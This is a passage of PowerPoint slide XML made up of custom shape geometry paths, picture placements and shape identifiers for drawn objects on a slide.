                  <a:moveTo>
                    <a:pt x="441472" y="693222"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="443759" y="694021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446135" y="693466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441472" y="693222"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="429758" y="680081"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="419476" y="682483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="680081"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="444703" y="676590"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429758" y="680081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484917" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444703" y="676590"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="429758" y="651779"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422849" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="658797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="651779"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="429758" y="658797"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422849" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="658797"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="469100" y="651779"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429758" y="651779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="658797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469100" y="651779"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="701836" y="593238"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="594470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701836" y="593238"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="711691" y="593238"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="701836" y="593238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="593238"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="694928" y="25058"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="594470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701836" y="593238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="593238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700272" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="25058"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="126003"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9833" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="133045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="126003"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="133045"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9833" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="133045"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="56817" y="126003"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16763" y="126003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="133045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56817" y="126003"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="694928" y="19324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="25058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700272" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="19324"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="711691" y="19324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="19324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700272" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="19324"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="711691" y="16469"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="672840" y="16469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677331" y="16916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675030" y="17320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="25058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="19324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="19324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="16469"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="672840" y="16469"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="675030" y="17320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677331" y="16916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672840" y="16469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7" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CCC3734-94F7-AE1A-F8E7-5AF7B7232964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25630" y="2858289"/>
              <a:ext cx="527292" cy="534920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="object 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89C8BFBF-3BBE-56B1-1284-8B46CC49F214}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2761335" y="2930004"/>
              <a:ext cx="447040" cy="269875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="397954" y="141566"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="396227" y="132588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="208788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="217766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397954" y="141566"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="407085" y="72986"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="405396" y="64008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="140208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="149186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407085" y="72986"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="443661" y="111086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441960" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="185928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="194906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443661" y="111086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="443661" y="88226"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441960" y="79248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="163068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="172046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443661" y="88226"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="443674" y="184238"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441947" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="269582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443674" y="184238"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="446722" y="8978"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="444995" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048" y="85344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4775" y="94322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446722" y="8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9" name="object 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{140BF89F-97EC-042A-29BC-7FF8FCA061D0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12928" y="3595179"/>
              <a:ext cx="1146369" cy="96316"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C61D3EE-18AE-3F4D-52F6-57296AC6622A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06568" y="3776875"/>
              <a:ext cx="242749" cy="215645"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA0E889-D795-D9DA-4815-79F3476DF75F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52714" y="3518048"/>
              <a:ext cx="650626" cy="961390"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FACF0A4F-7F2D-F174-145B-B092C7FAB848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82061" y="3748300"/>
              <a:ext cx="694001" cy="797050"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="object 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67C81612-55CB-5D41-F2C3-E49E63E69B15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1482061" y="3748300"/>
              <a:ext cx="694055" cy="797560"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="694055" h="797560">
                  <a:moveTo>
                    <a:pt x="561593" y="742948"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261772" y="797050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136974" y="755140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136974" y="737614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236660" y="718564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236660" y="679702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26633" y="717040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="706372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666607" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694001" y="10667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694001" y="597406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410922" y="648460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410922" y="687322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435273" y="681988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561593" y="726946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561593" y="742948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4" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BE993BF-5CFF-4AC6-C004-4B3AE63157FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1617513" y="4481343"/>
              <a:ext cx="125095" cy="66040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="125094" h="66039">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124798" y="65531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124798" y="4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5" name="object 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B32053AA-C7DE-C155-F9D2-500CD30B2CFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1743833" y="4475247"/>
              <a:ext cx="297815" cy="68580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="297814" h="68579">
                  <a:moveTo>
                    <a:pt x="297538" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="53339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="68579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297538" y="13715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29753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6" name="object 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F872D190-C2ED-D54F-6C43-C1AFC8BFBFF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1717961" y="4411239"/>
              <a:ext cx="36830" cy="74930"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="74929">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="74675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="9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3B6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7" name="object 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40A7D8C7-254A-D143-729F-8AF7BB57BCF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1482061" y="3867172"/>
              <a:ext cx="36830" cy="596900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="596900">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="582166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="596644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="14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8" name="object 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E751222-2AFC-BE5E-E5CB-2486BBFD00DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1509456" y="3763540"/>
              <a:ext cx="668655" cy="698500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="668655" h="698500">
                  <a:moveTo>
                    <a:pt x="668129" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="118109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="697990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668129" y="579118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66812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9" name="object 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7089359-366D-FEA9-1AD5-3D31F392D6B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1505270" y="3758541"/>
              <a:ext cx="676910" cy="708025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="676494" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="119593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="707990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28107" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3452" y="698862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="697987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4912" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="123108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28247" y="123108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="8370" y="697987"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3452" y="698862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="697987"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="668124" y="580608"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8370" y="697987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28107" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="587632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="580608"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="671583" y="579992"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668124" y="580608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671583" y="579992"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="676494" y="579992"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="671583" y="579992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="579992"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="676494" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668124" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673044" y="9123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="580608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671583" y="579992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="579992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="4998"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="8370" y="123108"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4912" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="126622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="123108"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="8370" y="126622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4912" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="126622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="28247" y="123108"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8370" y="123108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="126622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28247" y="123108"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="668124" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668124" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673044" y="9123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="4998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0" name="object 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A4CA01A-4341-6F2A-29B0-BFE8B19B036D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1576421" y="3829072"/>
              <a:ext cx="546735" cy="562610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="546735" h="562610">
                  <a:moveTo>
                    <a:pt x="546374" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="96773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="562354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546374" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546374" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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61" name="object 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C802F3B-C9DB-D267-AE6A-A65355315917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399" y="4360947"/>
              <a:ext cx="141539" cy="124967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D3C99D-0B3B-710D-0CB4-B639C20098C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1473310" y="3739247"/>
              <a:ext cx="711835" cy="815340"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="232850" y="720422"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="136969" y="739471"/>
                  </a:lnTo>
                  <a:lnTo>
